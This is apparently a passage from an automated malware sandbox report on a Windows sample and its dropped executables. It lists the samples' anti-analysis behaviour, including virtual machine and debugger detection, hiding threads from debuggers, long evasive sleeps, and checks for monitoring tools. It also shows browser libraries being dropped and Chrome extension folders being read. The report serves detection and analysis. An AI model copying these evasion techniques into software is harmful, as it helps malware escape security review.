Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Special instruction interceptor: First address: 2AB6CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Special instruction interceptor: First address: 4EC4E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Special instruction interceptor: First address: 993A1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Special instruction interceptor: First address: 2B3A1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Special instruction interceptor: First address: 65DD63 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Special instruction interceptor: First address: 65DE39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Special instruction interceptor: First address: 8062DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Special instruction interceptor: First address: 65B6CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Special instruction interceptor: First address: 89C4E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Special instruction interceptor: First address: 663A1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Special instruction interceptor: First address: EFDD63 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Special instruction interceptor: First address: EFDE39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Special instruction interceptor: First address: 10A62DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Special instruction interceptor: First address: EFB6CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Special instruction interceptor: First address: 113C4E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Special instruction interceptor: First address: F03A1E instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 4D20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 50C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 4E80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Memory allocated: 51B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Memory allocated: 5390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Memory allocated: 7390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 5290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 5350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 7350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Memory allocated: 4B50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Memory allocated: 4ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Memory allocated: 4D00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 51B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 5420000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Memory allocated: 5640000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Memory allocated: 57A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Memory allocated: 77A0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_05120B55 rdtsc 9_2_05120B55
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1383 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1422 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 428 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1432 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7504 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 1383 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -2767383s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5600 Thread sleep count: 563 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5600 Thread sleep time: -1126563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 736 Thread sleep count: 1422 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 736 Thread sleep time: -2845422s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8040 Thread sleep count: 428 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8040 Thread sleep time: -12840000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7808 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -80040s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 1432 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -2865432s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe TID: 2016 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe TID: 5088 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe TID: 5440 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe TID: 7984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe TID: 3228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe TID: 2936 Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe TID: 6692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe TID: 6724 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsIIEBKJECFC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C5EC930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.2162844185.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, DocumentsIIEBKJECFC.exe, DocumentsIIEBKJECFC.exe, 00000009.00000002.2175824531.0000000000533000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 0000000A.00000002.2203947891.0000000001003000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2208013300.0000000001003000.00000040.00000001.01000000.0000000E.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2611450888.0000000000882000.00000040.00000001.01000000.0000000F.sdmp, 82b4c5cad2.exe, 0000000E.00000002.2486083185.000000000134C000.00000040.00000001.01000000.00000010.sdmp, c3e1e78f6d.exe, 00000011.00000002.2737873865.0000000000882000.00000040.00000001.01000000.0000000F.sdmp, accd68d705.exe, 00000012.00000002.2663619610.0000000000B1A000.00000040.00000001.01000000.00000011.sdmp, 82b4c5cad2.exe, 00000013.00000002.2670919726.000000000134C000.00000040.00000001.01000000.00000010.sdmp, 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, 00000014.00000002.2758881775.000000000043A000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 82b4c5cad2.exe, 0000000E.00000002.2486797329.0000000001823000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2164783980.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2621266837.000000000147E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2621266837.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, 82b4c5cad2.exe, 0000000E.00000002.2486797329.0000000001855000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2729046669.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2789320451.0000000000E20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2729046669.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
Source: file.exe, 00000000.00000002.2162844185.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, DocumentsIIEBKJECFC.exe, 00000009.00000002.2175824531.0000000000533000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2203947891.0000000001003000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2208013300.0000000001003000.00000040.00000001.01000000.0000000E.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2611450888.0000000000882000.00000040.00000001.01000000.0000000F.sdmp, 82b4c5cad2.exe, 0000000E.00000002.2486083185.000000000134C000.00000040.00000001.01000000.00000010.sdmp, c3e1e78f6d.exe, 00000011.00000002.2737873865.0000000000882000.00000040.00000001.01000000.0000000F.sdmp, accd68d705.exe, 00000012.00000002.2663619610.0000000000B1A000.00000040.00000001.01000000.00000011.sdmp, 82b4c5cad2.exe, 00000013.00000002.2670919726.000000000134C000.00000040.00000001.01000000.00000010.sdmp, 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, 00000014.00000002.2758881775.000000000043A000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_05120A2E Start: 05120B4D End: 05120A4A 9_2_05120A2E
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_05120B55 rdtsc 9_2_05120B55
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C635FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C63C410
Contains functionality to read the PEB
